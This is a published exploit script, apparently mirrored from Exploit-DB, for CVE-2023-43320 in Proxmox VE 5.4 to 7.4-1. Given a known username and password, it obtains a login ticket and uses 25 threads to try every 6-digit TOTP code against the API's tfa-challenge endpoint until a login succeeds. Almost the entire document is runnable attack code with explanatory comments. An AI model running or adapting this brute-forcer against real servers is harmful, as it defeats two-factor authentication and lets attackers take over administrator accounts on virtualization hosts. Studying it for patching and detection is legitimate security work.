# Source: https://sploitus.com/exploit?id=EDB-ID:51763
# Exploit Title: Proxmox VE TOTP Brute Force
# Date: 09/23/2023
# Exploit Author: Cory Cline, Gabe Rust
# Vendor Homepage: https://www.proxmox.com/en/
# Software Link: http://download.proxmox.com/iso/
# Version: 5.4 - 7.4-1
# Tested on: Debian
# CVE : CVE-2023-43320

import concurrent.futures
import json
import os
import time
import urllib.parse

import requests
import urllib3

# Suppress urllib3 warnings; every request in this file is sent with
# verify=False (presumably this is to silence the resulting TLS warnings).
urllib3.disable_warnings()
# Number of worker threads handed to the ThreadPoolExecutor in the main loop.
threads=25

#################### REPLACE THESE VALUES #########################
# Credentials and base URL; passed to refresh_ticket() by the main loop and
# by attack().
password="KNOWN PASSWORD HERE"
username="KNOWN USERNAME HERE"
target_url="https://HOST:PORT"
##################################################################

# Shared module state. refresh_ticket() rebinds ticket_username,
# CSRFPreventionToken and ticket_data; attack() reads them.
# `ticket` is not referenced anywhere else in the visible source.
ticket=""
ticket_username=""
CSRFPreventionToken=""
ticket_data={}

# attack() calls refresh_ticket() again once more than auto_refresh_time
# minutes have passed since last_refresh_time (epoch seconds, set after each
# refresh). The inline note about expiration is the original author's; the
# server-side ticket lifetime is not visible in this file.
auto_refresh_time = 20 # in minutes - 30 minutes before expiration
last_refresh_time = 0

# Every 6-digit code as a zero-padded string, in ascending order:
# "000000", "000001", ..., "999999".
tokens = [str(num).zfill(6) for num in range(1000000)]

def refresh_ticket(target_url, username, password):
    """Log in with username/password and cache the response in module globals.

    POSTs the credentials (realm ``pve``, ``new-format`` set to ``1``) to
    ``<target_url>/api2/extjs/access/ticket`` with certificate verification
    disabled, percent-decodes the response text and parses it as JSON.

    Side effects: rebinds the globals ``ticket_data`` (the whole parsed
    response), ``CSRFPreventionToken`` and ``ticket_username`` (both taken
    from the response's ``data`` object).

    Returns ``None``. A response without the expected keys raises
    ``KeyError``; a non-JSON body raises from ``json.loads``.
    """
    global CSRFPreventionToken
    global ticket_username
    global ticket_data

    endpoint = target_url + "/api2/extjs/access/ticket"
    form = {"username": username, "password": password, "realm": "pve", "new-format": "1"}
    response = requests.post(endpoint, headers={}, cookies={}, data=form, verify=False)

    # The body is percent-decoded before it is handed to the JSON parser.
    ticket_data = json.loads(urllib.parse.unquote(response.text))

    payload = ticket_data["data"]
    CSRFPreventionToken = payload["CSRFPreventionToken"]
    ticket_username = payload["username"]

def attack(token):
    """Submit one candidate code against the cached TFA challenge.

    If more than ``auto_refresh_time`` minutes have passed since
    ``last_refresh_time``, ``refresh_ticket`` is called first and the
    timestamp is updated. The cached ticket is then re-encoded and POSTed to
    ``<target_url>/api2/extjs/access/ticket`` as ``tfa-challenge`` together
    with ``password = "totp:<token>"``.

    A response body longer than 350 characters is printed and the whole
    process is terminated with ``os._exit(1)`` (presumably only a successful
    login produces a body that long; confirm against the target). Otherwise
    the function returns ``None``.
    """
    global last_refresh_time

    # Re-authenticate when the cached ticket is older than the refresh window.
    if int(time.time()) > last_refresh_time + auto_refresh_time * 60:
        refresh_ticket(target_url, username, password)
        last_refresh_time = int(time.time())

    endpoint = target_url + "/api2/extjs/access/ticket"
    request_headers = {"Csrfpreventiontoken": CSRFPreventionToken}

    # json.dumps wraps the ticket string in quotes and backslash-escapes the
    # quotes inside it; [1:-1] drops the outer pair.
    escaped_ticket = json.dumps(ticket_data["data"]["ticket"])[1:-1]
    # Un-escape the quotes around the "totp"/"recovery" keys and
    # percent-encode the colon that follows them.
    challenge = escaped_ticket.replace('\\"totp\\":', '\"totp\"%3A')
    challenge = challenge.replace('\\"recovery\\":', '\"recovery\"%3A')

    form = {
        "username": ticket_username,
        "tfa-challenge": challenge,
        "password": f"totp:{token!s}",
    }
    reply = requests.post(endpoint, headers=request_headers, cookies={}, data=form, verify=False)

    if len(reply.text) <= 350:
        return
    print(reply.text)
    # os._exit ends the process immediately, including all worker threads.
    os._exit(1)

# Driver loop. It never exits on its own: the process ends only when attack()
# calls os._exit, or when it is interrupted.
while True:
    # Begin every sweep with a fresh ticket and reset the refresh timer that
    # attack() checks.
    refresh_ticket(target_url, username, password)
    last_refresh_time = int(time.time())

    # One task per candidate in `tokens`, run on `threads` worker threads.
    # NOTE: wait() only blocks until the futures finish; exceptions raised
    # inside attack() stay stored in the futures and are never inspected.
    with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
        pending = [executor.submit(attack, token) for token in tokens]
        concurrent.futures.wait(pending)